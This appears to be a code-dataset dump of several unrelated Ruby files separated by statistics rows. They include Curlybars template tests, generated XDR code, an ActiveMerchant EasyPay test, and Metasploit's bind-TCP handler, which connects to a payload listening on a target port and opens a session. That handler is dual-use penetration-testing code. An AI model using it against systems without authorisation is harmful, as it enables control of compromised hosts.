template = Curlybars.compile(<<-HBS)
{{this_method_yields}}
HBS
expect(eval(template)).to resemble("")
end
it "doesn't render if the path returns a presenter" do
template = Curlybars.compile(<<-HBS)
{{user}}
HBS
expect(eval(template)).to resemble("")
end
it "doesn't render if the path returns a collection of presenters" do
template = Curlybars.compile(<<-HBS)
{{array_of_users}}
HBS
expect(eval(template)).to resemble("")
end
end
describe "#validate" do
it "with errors" do
dependency_tree = {}
source = <<-HBS
{{helper}}
HBS
errors = Curlybars.validate(dependency_tree, source)
expect(errors).not_to be_empty
end
it "raises when using a partial as an helper" do
dependency_tree = { partial: :partial }
source = <<-HBS
{{partial}}
HBS
errors = Curlybars.validate(dependency_tree, source)
expect(errors).not_to be_empty
end
it "without errors" do
dependency_tree = { helper: :helper }
source = <<-HBS
{{helper}}
HBS
errors = Curlybars.validate(dependency_tree, source)
expect(errors).to be_empty
end
it "validates {{helper.invoked_on_nil}} with errors" do
dependency_tree = { helper: :helper }
source = <<-HBS
{{helper.invoked_on_nil}}
HBS
errors = Curlybars.validate(dependency_tree, source)
expect(errors).not_to be_empty
end
describe "with context" do
it "without errors in block_helper" do
dependency_tree = { helper: :helper, context: nil }
source = <<-HBS
{{helper context}}
HBS
errors = Curlybars.validate(dependency_tree, source)
expect(errors).to be_empty
end
end
end
end
| 24.374332 | 90 | 0.596534 |
ed91f62c4fa4f5b77b1ae221c825aa5a93e3a4f6 | 6,152 | # -*- coding: binary -*-
module Msf
module Handler
###
#
# This module implements the Bind TCP handler. This means that
# it will attempt to connect to a remote host on a given port for a period of
# time (typically the duration of an exploit) to see if a the payload has
# started listening. This can tend to be rather verbose in terms of traffic
# and in general it is preferable to use reverse payloads.
#
###
module BindTcp
include Msf::Handler
#
# Returns the handler specific string representation, in this case
# 'bind_tcp'.
#
def self.handler_type
return "bind_tcp"
end
#
# Returns the connection oriented general handler type, in this case bind.
#
def self.general_handler_type
"bind"
end
# A string suitable for displaying to the user
#
# @return [String]
def human_name
"bind TCP"
end
#
# Initializes a bind handler and adds the options common to all bind
# payloads, such as local port.
#
def initialize(info = {})
super
register_options(
[
Opt::LPORT(4444),
OptAddress.new('RHOST', [false, 'The target address', '']),
], Msf::Handler::BindTcp)
self.conn_threads = []
self.listener_threads = []
self.listener_pairs = {}
end
#
# Kills off the connection threads if there are any hanging around.
#
def cleanup_handler
# Kill any remaining handle_connection threads that might
# be hanging around
conn_threads.each { |thr|
thr.kill
}
end
#
# Starts a new connecting thread
#
def add_handler(opts={})
# Merge the updated datastore values
opts.each_pair do |k,v|
datastore[k] = v
end
# Start a new handler
start_handler
end
#
# Starts monitoring for an outbound connection to become established.
#
def start_handler
# Maximum number of seconds to run the handler
ctimeout = 150
if (exploit_config and exploit_config['active_timeout'])
ctimeout = exploit_config['active_timeout'].to_i
end
# Take a copy of the datastore options
rhost = datastore['RHOST']
lport = datastore['LPORT']
# Ignore this if one of the required options is missing
return if not rhost
return if not lport
# Only try the same host/port combination once
phash = rhost + ':' + lport.to_s
return if self.listener_pairs[phash]
self.listener_pairs[phash] = true
# Start a new handling thread
self.listener_threads << framework.threads.spawn("BindTcpHandlerListener-#{lport}", false) {
client = nil
print_status("Started #{human_name} handler against #{rhost}:#{lport}")
if (rhost == nil)
raise ArgumentError,
"RHOST is not defined; bind stager cannot function.",
caller
end
stime = Time.now.to_i
while (stime + ctimeout > Time.now.to_i)
begin
client = Rex::Socket::Tcp.create(
'PeerHost' => rhost,
'PeerPort' => lport.to_i,
'Proxies' => datastore['Proxies'],
'Context' =>
{
'Msf' => framework,
'MsfPayload' => self,
'MsfExploit' => assoc_exploit
})
rescue Rex::ConnectionError => e
vprint_error(e.message)
rescue
wlog("Exception caught in bind handler: #{$!.class} #{$!}")
end
break if client
# Wait a second before trying again
Rex::ThreadSafe.sleep(0.5)
end
# Valid client connection?
if (client)
# Increment the has connection counter
self.pending_connections += 1
# Timeout and datastore options need to be passed through to the client
opts = {
:datastore => datastore,
:expiration => datastore['SessionExpirationTimeout'].to_i,
:comm_timeout => datastore['SessionCommunicationTimeout'].to_i,
:retry_total => datastore['SessionRetryTotal'].to_i,
:retry_wait => datastore['SessionRetryWait'].to_i
}
# Start a new thread and pass the client connection
# as the input and output pipe. Client's are expected
# to implement the Stream interface.
conn_threads << framework.threads.spawn("BindTcpHandlerSession", false, client) { |client_copy|
begin
handle_connection(wrap_aes_socket(client_copy), opts)
rescue
elog("Exception raised from BindTcp.handle_connection: #{$!}")
end
}
else
wlog("No connection received before the handler completed")
end
}
end
def wrap_aes_socket(sock)
if datastore["PAYLOAD"] !~ /java\// or (datastore["AESPassword"] || "") == ""
return sock
end
socks = Rex::Socket::tcp_socket_pair()
socks[0].extend(Rex::Socket::Tcp)
socks[1].extend(Rex::Socket::Tcp)
m = OpenSSL::Digest.new('md5')
m.reset
key = m.digest(datastore["AESPassword"] || "")
Rex::ThreadFactory.spawn('AESEncryption', false) {
c1 = OpenSSL::Cipher.new('aes-128-cfb8')
c1.encrypt
c1.key=key
sock.put([0].pack('N'))
sock.put(c1.iv=c1.random_iv)
buf1 = socks[0].read(4096)
while buf1 and buf1 != ""
sock.put(c1.update(buf1))
buf1 = socks[0].read(4096)
end
sock.close()
}
Rex::ThreadFactory.spawn('AESEncryption', false) {
c2 = OpenSSL::Cipher.new('aes-128-cfb8')
c2.decrypt
c2.key=key
iv=""
while iv.length < 16
iv << sock.read(16-iv.length)
end
c2.iv = iv
buf2 = sock.read(4096)
while buf2 and buf2 != ""
socks[0].put(c2.update(buf2))
buf2 = sock.read(4096)
end
socks[0].close()
}
return socks[1]
end
#
# Nothing to speak of.
#
def stop_handler
# Stop the listener threads
self.listener_threads.each do |t|
t.kill
end
self.listener_threads = []
self.listener_pairs = {}
end
protected
attr_accessor :conn_threads # :nodoc:
attr_accessor :listener_threads # :nodoc:
attr_accessor :listener_pairs # :nodoc:
end
end
end
| 25.213115 | 103 | 0.612809 |
79081a7e78321097dfb172a24c5981b3e439ddc7 | 474 | # This code was automatically generated using xdrgen
# DO NOT EDIT or your changes may be overwritten
require 'xdr'
# === xdr source ============================================================
#
# union switch (int v) {
# case 0:
# void;
# }
#
# ===========================================================================
module Vixal
class AccountEntry
class Ext < XDR::Union
switch_on XDR::Int, :v
switch 0
end
end
end
| 19.75 | 77 | 0.424051 |
014a1bae48984fa9295cd77d9e449da2e5e4c444 | 506 | require 'test_helper'
class EasyPayHelperTest < Test::Unit::TestCase
include ActiveMerchant::Billing::Integrations
def setup
@helper = EasyPay::Helper.new(123, 'test_account', :amount => 500, :secret => 'secret')
end
def test_basic_helper_fields
assert_field 'EP_MerNo', 'test_account'
assert_field 'EP_Sum', '500'
assert_field 'EP_OrderNo', '123'
end
def test_request_signature_string
assert_equal 'test_accountsecret123500', @helper.request_signature_string
end
end
| 25.3 | 91 | 0.745059 |
ac3c54092cde2dff3826a48535bbb6ab61f0bcbc | 199 | # frozen_string_literal: true
require 'forwardable'
module Signalwire::Relay::Calling
class ConnectAction < Action
def result
ConnectResult.new(component: @component)
end
end
end
| 16.583333 | 46 | 0.738693 |
bf0307a64745d6af6c6f833d2b8f862d111c299d | 47 | task(:default).clear.enhance(%i[rubocop spec])
| 23.5 | 46 | 0.744681 |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.